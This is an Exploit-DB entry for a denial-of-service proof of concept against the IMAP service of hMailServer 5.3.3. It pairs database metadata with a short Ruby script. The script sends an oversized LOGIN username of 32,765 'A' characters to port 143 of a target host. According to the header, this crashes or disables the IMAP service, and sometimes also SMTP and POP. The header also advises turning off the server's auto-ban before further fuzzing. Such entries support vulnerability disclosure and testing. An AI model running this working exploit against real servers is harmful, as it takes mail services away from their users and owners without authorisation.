hMAilServer 5.3.3 - IMAP Remote Crash (PoC)

Author: John Smith
type: dos
platform: windows
port: 
date_added: 2012-10-28 
date_updated: 2012-10-28 
verified: 1 
codes: OSVDB-86769 
tags: 
aliases:  
screenshot_url: http://www.exploit-db.com/screenshots/idlt22500/screen-shot-2012-10-28-at-102142-am.png 
application_url: http://www.exploit-db.comhMailServer-5.3.3-B1879.exe

# Exploit Title: hMailServer 5.3.3 IMAP Remote Crash PoC
# Date: 10/27/2012
# Vendor Homepage: http://hmailserver.com
# Software Link: http://www.hmailserver.com/index.php?page=background_download_file&downloadid=207
# Version: hMailServer 5.3.3 - Build 1879
# Tested on:
#	- hMailServer 5.3.3 with default settings
#	- Reliably corruption makes IMAP service inaccessible on WIN XP SP2 and WIN 2K3R2 SP2
#	- Unreliable corruption makes all services (SMTP, IMAP, and POP) inaccessible on WIN 2K8R2 SP1
#
# Note: Disable "Auto-ban" in the hMailServer Admin console if performing additional fuzzing.

#!/usr/bin/ruby

require 'socket'

s = TCPSocket.open(ARGV[0], 143)

cmd = "a LOGIN "
address = "A" * 32765
password = " AAAAAAAA\r\n"
logout = "a LOGOUT\r\n"

pkt = cmd
pkt << address
pkt << password
pkt << logout

s.write(pkt)

while resp = s.gets
	p resp
end

s.close